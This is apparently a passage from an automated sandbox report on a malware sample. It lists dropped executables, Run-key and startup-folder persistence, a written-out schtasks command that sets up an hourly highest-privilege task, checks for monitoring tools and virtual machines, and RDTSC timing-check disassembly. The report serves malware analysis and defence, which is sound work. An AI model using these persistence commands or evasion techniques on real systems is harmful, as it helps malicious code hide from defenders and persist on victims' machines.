                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: gakjennq entropy: 7.937614618758915
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: plaza[1].exe.7.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: plaza[1].exe.7.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: plaza[1].exe.7.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: plaza[1].exe.7.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: ladas[1].exe.7.drStatic PE information: section name: entropy: 7.9816083368851425
                          Source: ladas[1].exe.7.drStatic PE information: section name: gakjennq entropy: 7.952472916491743
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: entropy: 7.9816083368851425
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: gakjennq entropy: 7.952472916491743
                          Source: amert[1].exe.7.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: amert[1].exe.7.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: niks[1].exe.7.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: niks[1].exe.7.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: explorgu.exe.47.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: explorgu.exe.47.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\amert[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\plaza[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\sy4bhhGvZ9bFDDZTr89U.exeJump to dropped file
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll.tmpJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\aCN0ucpg7A4ErZQbp9NR.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amert[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\niks[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\zs1nXDHCjbiIGotgg4qJ.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\fu[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\well[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\yk50FvD1XOCg2Y2iAkjB.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UdgmfEtw7ukqXx7vdO3L.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\fu[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\fkGORKNF0MOvzFIhlS3N.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\well[1].exeJump to dropped file
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll (copy)Jump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ladas[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UP_uKSEYzgg0BHrTE9Qz.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\niks[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\1tu3JEnOc1WEcDVr1Q0N.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\ZLGJz1zjooaGjpiGIhT0.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\65cFitrzjaGsYAt5EzWY.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeMS131\EdgeMS131.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\plaza[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\well[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\HgvXSle13lm2R30FoCuW.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\ZUEHnz5YzDsyCHbnegZs.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\dZPbe9okQutRw6uffMvo.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\IK6nP7Vsyy6xQfngv8hq.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\soOc6NhyUO7lFaV2eQJV.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\RhvHlFoQ86AMGIsTANJB.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ladas[1].exeJump to dropped file

                          Boot Survival

                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV131
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Window searched: window name: FilemonClass
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Window searched: window name: RegmonClass
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Window searched: window name: Regmonclass
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Window searched: window name: Filemonclass
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: RegmonClass
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe Window searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe Window searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe Window searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe Window searched: window name: Filemonclass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Window searched: window name: FilemonClass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Window searched: window name: RegmonClass
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe File created: C:\Windows\Tasks\explorgu.job
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032E781 second address: 000000000032E787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032E787 second address: 000000000032E78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032E78B second address: 000000000032E7AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F7E95375D02h 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032E7AC second address: 000000000032E7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64AAh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003305C1 second address: 0000000000330623 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, C8D0h 0x0000000e push 00000000h 0x00000010 call 00007F7E95375CFBh 0x00000015 mov ebx, dword ptr [ebp+12467751h] 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F7E95375CF8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 add edi, dword ptr [ebp+122D363Dh] 0x0000003e xchg eax, esi 0x0000003f push ebx 0x00000040 jmp 00007F7E95375CFDh 0x00000045 pop ebx 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push edx 0x0000004b pop edx 0x0000004c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000330623 second address: 0000000000330642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033345F second address: 00000000003334DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F7E95375D03h 0x00000012 jns 00007F7E95375CF8h 0x00000018 popad 0x00000019 nop 0x0000001a mov edi, 6C0EE7F3h 0x0000001f push 00000000h 0x00000021 mov bh, 8Fh 0x00000023 jmp 00007F7E95375D08h 0x00000028 push 00000000h 0x0000002a xor dword ptr [ebp+12462F6Bh], esi 0x00000030 jmp 00007F7E95375CFAh 0x00000035 xchg eax, esi 0x00000036 jmp 00007F7E95375D04h 0x0000003b push eax 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jl 00007F7E95375CF6h 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003374D1 second address: 00000000003374FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E954D64B1h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003374FC second address: 0000000000337500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000337500 second address: 0000000000337506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000337506 second address: 000000000033750C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E37BC second address: 00000000002E37CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E954D64A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E37CA second address: 00000000002E37E8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E95375CF6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E95375D00h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000337A89 second address: 0000000000337A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000337A8D second address: 0000000000337A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F7E95375CF6h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003355EB second address: 00000000003355F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000339AFD second address: 0000000000339B0E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7E95375CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000338C68 second address: 0000000000338C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AC7D second address: 000000000033AC92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AD1F second address: 000000000033AD31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AD31 second address: 000000000033AD36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000339CE7 second address: 0000000000339CF1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E954D64A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AD36 second address: 000000000033AD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95375D08h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e je 00007F7E95375CFCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000339CF1 second address: 0000000000339D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E954D64B1h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E954D64AEh 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033CB10 second address: 000000000033CB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033CB19 second address: 000000000033CB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033AE77 second address: 000000000033AE85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7E95375CF6h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E02EB second address: 00000000002E02EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E02EF second address: 00000000002E02F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033D177 second address: 000000000033D185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033D317 second address: 000000000033D31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033D31E second address: 000000000033D32E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E954D64ABh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033D32E second address: 000000000033D3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, esi 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bh, dh 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c jl 00007F7E95375CFCh 0x00000022 mov eax, dword ptr [ebp+122D0AC1h] 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F7E95375CF8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 sub edi, 12C8C07Eh 0x00000048 jmp 00007F7E95375D07h 0x0000004d mov dword ptr [ebp+122D1A3Ah], ebx 0x00000053 push FFFFFFFFh 0x00000055 movzx ebx, cx 0x00000058 push eax 0x00000059 pushad 0x0000005a push edi 0x0000005b jmp 00007F7E95375CFAh 0x00000060 pop edi 0x00000061 push eax 0x00000062 push edx 0x00000063 ja 00007F7E95375CF6h 0x00000069 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E346 second address: 000000000033E34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E34A second address: 000000000033E372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E95375D07h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F7E95375CF6h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E452 second address: 000000000033E457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
